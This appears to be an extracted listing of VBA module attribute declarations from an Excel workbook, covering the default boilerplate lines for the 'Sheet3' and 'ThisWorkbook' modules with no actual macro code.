                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True

                                          Module: Sheet3

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Sheet3"

                                          2

                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True

                                          Module: ThisWorkbook

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "ThisWorkbook"

                                          2

                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True